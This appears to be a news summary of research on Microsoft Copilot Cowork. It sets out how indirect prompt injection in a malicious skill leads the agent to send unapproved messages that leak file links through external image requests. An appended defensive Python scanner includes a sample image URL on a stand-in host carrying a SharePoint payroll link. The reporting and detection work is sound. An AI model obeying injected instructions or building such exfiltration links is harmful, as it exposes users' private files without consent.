May 25, 2026
Reply-all from hell
Microsoft Copilot Cowork Exfiltrates Files
Microsoft’s office AI just got called a snitch with a send button
TLDR: Researchers say Microsoft’s office AI can be manipulated into leaking access to private company files through messages it sends without asking first. Commenters are split between “this is an obvious bad design” and “this is what happens when companies rush to shove AI into everything.”
Microsoft’s new workplace AI helper, Copilot Cowork, is being dragged after researchers showed it could be tricked into sending out links to private files a user can access in OneDrive or SharePoint. In plain English: if the AI gets fed poisoned instructions through a so-called skill, it may quietly message the user in Teams or email, and simply opening that message can leak access to sensitive documents. The part making commenters clutch their keyboards? Microsoft says the bot asks permission for sensitive actions, but in this case messages to the active user can go out without approval.
And the comment section was absolutely not in a forgiving mood. One camp basically said, “This isn’t some shocking sci-fi hack, this is what happens when you give a program the keys to the office.” Several users compared a malicious AI skill to installing a shady plugin and then acting surprised when your stuff disappears. Others were much less calm, mocking the corporate rush to become “AI native” and roasting the exec class with full LinkedInLunatics energy. One of the sharpest reactions boiled down to: congratulations to the bosses who rolled this out company-wide before basic guardrails existed.
Still, not everyone was screaming apocalypse. A few commenters said they actually like the product, but now want stronger admin controls before any wider rollout. The vibe was a messy mix of “obvious in hindsight,” “why was this allowed,” and “maybe don’t let the office robot auto-DM itself secret file links.”
Key Points
- The article says Microsoft Copilot Cowork is vulnerable to file exfiltration through indirect prompt injection in a malicious skill.
- According to the article, self-addressed emails and Teams messages can be sent by Copilot Cowork without human approval, despite Microsoft documentation describing these as sensitive actions.
- The attack uses pre-authenticated download links for files the user can access and exfiltrates those links through external image requests embedded in a message.
- The article states the technique can expose files from SharePoint or OneDrive, including documents containing PII and financial data.
- The article also mentions a separate disclosed vulnerability that allows direct data egress from Copilot Cowork’s sandbox environment.
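
For defenders, the image-request channel described in the key points can be checked before an agent-sent message is rendered. The sketch below is an added example, not code from the article or from Microsoft: the names `scan_message`, `TRUSTED_IMAGE_HOSTS` and `FILE_DOMAINS`, the tenant host `contoso.sharepoint.com` and the sample message are all assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Assumptions: the tenant's own image hosts, and the file-storage domains
# whose links must never appear inside a request to an outside server.
TRUSTED_IMAGE_HOSTS = {"contoso.sharepoint.com"}
FILE_DOMAINS = ("sharepoint.com", "1drv.ms", "onedrive.live.com")
URL_IN_TEXT = re.compile(r"https?://([^/\s?&#:]+)", re.I)

class _ImgSources(HTMLParser):
    def __init__(self):
        super().__init__()
        self.sources = []  # src attribute of every <img> tag seen

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.sources += [v for k, v in attrs if k == "src" and v]

def _carries_file_link(parts):
    """True if the path or query embeds a URL on a file-storage domain."""
    payload = parts.path + "?" + parts.query
    for _ in range(3):  # undo nested percent-encoding
        payload = unquote(payload)
    hosts = (m.group(1).lower() for m in URL_IN_TEXT.finditer(payload))
    return any(h == d or h.endswith("." + d) for h in hosts for d in FILE_DOMAINS)

def scan_message(html):
    """Return [(src, verdict)] for each image fetched from an untrusted host."""
    collector = _ImgSources()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        parts = urlsplit(src)
        host = (parts.hostname or "").lower()
        if not host or host in TRUSTED_IMAGE_HOSTS:
            continue  # inline (cid:/data:) or tenant-hosted image
        verdict = "carries-file-link" if _carries_file_link(parts) else "external-image"
        findings.append((src, verdict))
    return findings

# Constructed sample message body; hosts and token are placeholders.
SAMPLE = (
    '<p>Weekly summary.</p><img src="cid:logo">'
    '<img src="https://contoso.sharepoint.com/sites/hr/banner.png">'
    '<img src="https://img.example.net/t.png?d=https%3A%2F%2Fcontoso.sharepoint.com'
    '%2Fsites%2Fhr%2Fpayroll.xlsx%3Ftoken%3DPLACEHOLDER">'
    '<img src="https://cdn.example.org/pixel.gif">'
)
if __name__ == "__main__":
    print(*scan_message(SAMPLE), sep="\n")
```

A link hidden with another encoding such as base64 is reported only as `external-image`, so the stricter policy is to strip or proxy every external image in agent-sent messages rather than only those with a recognizable file link.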